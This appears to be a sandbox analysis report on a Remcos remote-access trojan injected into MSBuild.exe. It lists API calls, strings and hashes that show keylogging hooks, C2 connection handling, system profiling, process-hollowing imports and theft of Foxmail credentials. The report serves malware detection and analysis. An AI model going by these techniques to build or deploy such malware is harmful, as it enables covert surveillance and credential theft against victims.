                                                                                                                                            • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                            • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                                                            • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                            • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• GetLastError.KERNEL32 ref: 00409A1B
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
• TranslateMessage.USER32(?), ref: 00409A7A
• DispatchMessageA.USER32(?), ref: 00409A85
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error $`v
• API String ID: 3219506041-557476379
• Opcode ID: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
• Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
• Opcode Fuzzy Hash: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
• Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
• FindClose.KERNEL32(00000000), ref: 100011DB
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
• Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

Control-flow Graph

APIs
  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
• Sleep.KERNEL32(00000BB8), ref: 0040E603
• ExitProcess.KERNEL32 ref: 0040E672
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 5.3.0 Pro$override$pth_unenc$BG
• API String ID: 2281282204-3981147832
• Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
• Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
• Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
• Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3525466593-0
                                                                                                                                            • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                            • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                                                            • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                            • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                                                            APIs
                                                                                                                                            • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                            Strings
                                                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                            • API String ID: 2532271599-1507639952
                                                                                                                                            • Opcode ID: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                                                                            • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                                                            • Opcode Fuzzy Hash: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                                                                            • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                                                            APIs
                                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1815803762-0
                                                                                                                                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                            • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                                                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                            • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                                                            APIs
                                                                                                                                            • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Name$ComputerUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4229901323-0
                                                                                                                                            • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                            • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                            • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: recv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1507349165-0
                                                                                                                                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                                                                                                                                            Control-flow Graph (function 40d767; rendered graph not reproduced. Nodes reference GetModuleFileNameW, CreateThread, StrToIntA, SetProcessDEPPolicy, DeleteFileW and Sleep.)
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 0040D790
                                                                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                            • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-QM0FWK$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                            • API String ID: 2830904901-3918134458
                                                                                                                                            • Opcode ID: f77ba8efe1220cbbf4275539dc4f663c6c9e11553760db3633d304cd3e64821f
                                                                                                                                            • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                                                            • Opcode Fuzzy Hash: f77ba8efe1220cbbf4275539dc4f663c6c9e11553760db3633d304cd3e64821f
                                                                                                                                            • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                                            Control-flow Graph (function 413fd4; rendered graph not reproduced. Nodes reference Sleep, WSAGetLastError, GetTickCount and CreateThread.)
APIs
• Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
• WSAGetLastError.WS2_32 ref: 00414249
• Sleep.KERNEL32(00000000,00000002), ref: 00414B88
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Sleep$ErrorLastLocalTime
• String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-QM0FWK$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
• API String ID: 524882891-3547732219
• Opcode ID: a2137af44fb69178eb9df1ce90f086248dcc72ef45f395939ae5dfdeb95f1cae
• Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
• Opcode Fuzzy Hash: a2137af44fb69178eb9df1ce90f086248dcc72ef45f395939ae5dfdeb95f1cae
• Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

Control-flow Graph

                                                                                                                                            control_flow_graph 971 411c81-411cca GetModuleFileNameW call 401faa * 3 978 411ccc-411d56 call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea 971->978 1003 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 978->1003 1026 411df8 1003->1026 1027 411dea-411df2 Sleep 1003->1027 1028 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1026->1028 1027->1003 1027->1026 1051 411e9a 1028->1051 1052 411e8c-411e94 Sleep 1028->1052 1053 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1051->1053 1052->1028 1052->1051 1076 411f3c-411f60 1053->1076 1077 411f2e-411f36 Sleep 1053->1077 1078 411f64-411f80 call 401e07 call 41b61a 1076->1078 1077->1053 1077->1076 1083 411f82-411f91 call 401e07 DeleteFileW 1078->1083 1084 411f97-411fb3 call 401e07 call 41b61a 1078->1084 1083->1084 1091 411fd0 1084->1091 1092 411fb5-411fce call 401e07 DeleteFileW 1084->1092 1094 411fd4-411ff0 call 401e07 call 41b61a 1091->1094 1092->1094 1100 411ff2-412004 call 401e07 DeleteFileW 1094->1100 1101 41200a-41200c 1094->1101 1100->1101 1102 412019-412024 Sleep 1101->1102 1103 41200e-412010 1101->1103 1102->1078 1106 41202a-41203c call 408339 1102->1106 1103->1102 1105 412012-412017 1103->1105 1105->1102 1105->1106 1110 412092-4120b1 call 401e13 * 3 1106->1110 1111 41203e-41204c call 408339 1106->1111 1122 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1110->1122 1111->1110 1117 41204e-41205c call 408339 1111->1117 1117->1110 1123 41205e-41208a Sleep call 401e13 * 3 1117->1123 1143 412125-41226f call 41aec8 call 41ad46 call 4027ec call 4027cb * 6 call 
40275c call 4027cb call 40275c call 404468 call 401eea * 10 1122->1143 1144 412274-41236b call 41aec8 call 4027ec call 4027cb * 6 call 40275c call 404468 call 401eea * 7 1122->1144 1123->978 1137 412090 1123->1137 1137->1122 1213 41236f-4123db call 401eea call 401e13 call 401eea * 8 1143->1213 1144->1213 1245 4123e0-4123f6 call 401eea 1213->1245
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76E23530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
• Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
• Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
• Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
• Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
• Sleep.KERNEL32(00000064), ref: 00412060
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$HDG$HDG$>G$>G
• API String ID: 1223786279-3931108886
• Opcode ID: 50867f7fd8278ac03888c6cbd25935d2336d67605b6c946f911f9e5deb691de1
• Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
• Opcode Fuzzy Hash: 50867f7fd8278ac03888c6cbd25935d2336d67605b6c946f911f9e5deb691de1
• Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
• lstrlenW.KERNEL32(?), ref: 100014C5
• lstrlenW.KERNEL32(?), ref: 100014E0
• lstrlenW.KERNEL32(?,?), ref: 1000150F
• lstrcatW.KERNEL32(00000000), ref: 10001521
• lstrlenW.KERNEL32(?,?), ref: 10001547
• lstrcatW.KERNEL32(00000000), ref: 10001553
• lstrlenW.KERNEL32(?,?), ref: 10001579
• lstrcatW.KERNEL32(00000000), ref: 10001585
• lstrlenW.KERNEL32(?,?), ref: 100015AB
• lstrcatW.KERNEL32(00000000), ref: 100015B7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
